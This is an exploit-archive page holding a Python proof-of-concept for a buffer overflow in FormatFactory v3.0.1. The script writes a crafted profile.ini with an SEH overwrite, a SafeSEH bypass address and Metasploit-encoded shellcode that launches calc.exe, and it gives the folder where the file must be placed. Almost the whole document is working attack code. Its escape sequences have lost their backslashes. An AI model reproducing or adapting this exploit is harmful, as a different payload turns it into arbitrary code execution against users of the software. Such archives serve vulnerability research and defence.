[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : FormatFactory v3.0.1 Profile File Handling Buffer Overflow
# Published : 2012-11-20
# Author :
# Previous Title : NVidia Display Driver Service (Nsvr) Exploit
# Next Title : Ubuntu 12.10 64-Bit sock_diag_handlers Local Root Exploit


#!/usr/bin/python
 
# Exploit Title: FormatFactory v3.0.1 Profile File Handling Buffer Overflow
# Version:       <= 3.0.1
# Date:          2012-11-19
# Author:        Julien Ahrens (@MrTuxracer)
# Homepage:      http://www.inshell.net
# Software Link: http://www.pcfreetime.com
# Tested on:     Windows XP SP3 Professional German
# Notes:         -
# Howto:         Copy .ini to %USERPROFILE%My DocumentsFormatFactoryPicCustom

from struct import pack

file="profile.ini"

junk1="xCC" * 260
nseh="xebx06x90x90"
eip=pack('<L',0x024C1923) # CALL DWORD PTR SS:[EBP-C] at 0x024c1923 - SafeSEH Bypass
nops="x90" * 10 
junk2="xCC" * 10000

# windows/exec CMD=calc.exe 
# Encoder: x86/shikata_ga_nai
# powered by Metasploit 
# msfpayload windows/exec CMD=calc.exe R | msfencode -b 'x00'

shellcode = ("xbax68x3ex85x1fxd9xcaxd9x74x24xf4x58x29xc9" +
"xb1x33x31x50x12x83xe8xfcx03x38x30x67xeax44" +
"xa4xeex15xb4x35x91x9cx51x04x83xfbx12x35x13" +
"x8fx76xb6xd8xddx62x4dxacxc9x85xe6x1bx2cxa8" +
"xf7xadxf0x66x3bxafx8cx74x68x0fxacxb7x7dx4e" +
"xe9xa5x8ex02xa2xa2x3dxb3xc7xf6xfdxb2x07x7d" +
"xbdxccx22x41x4ax67x2cx91xe3xfcx66x09x8fx5b" +
"x57x28x5cxb8xabx63xe9x0bx5fx72x3bx42xa0x45" +
"x03x09x9fx6ax8ex53xe7x4cx71x26x13xafx0cx31" +
"xe0xd2xcaxb4xf5x74x98x6fxdex85x4dxe9x95x89" +
"x3ax7dxf1x8dxbdx52x89xa9x36x55x5ex38x0cx72" +
"x7ax61xd6x1bxdbxcfxb9x24x3bxb7x66x81x37x55" +
"x72xb3x15x33x85x31x20x7ax85x49x2bx2cxeex78" +
"xa0xa3x69x85x63x80x86xcfx2exa0x0ex96xbaxf1" +
"x52x29x11x35x6bxaax90xc5x88xb2xd0xc0xd5x74" +
"x08xb8x46x11x2ex6fx66x30x4dxeexf4xd8xbcx95" +
"x7cx7axc1")

poc="Type=" + junk1 + nseh + eip + nops + shellcode + junk2 

try:
    print "[*] Creating exploit file...n";
    writeFile = open (file, "w")
    writeFile.write( poc )
    writeFile.close()
    print "[*] File successfully created!";
except:
    print "[!] Error while creating file!";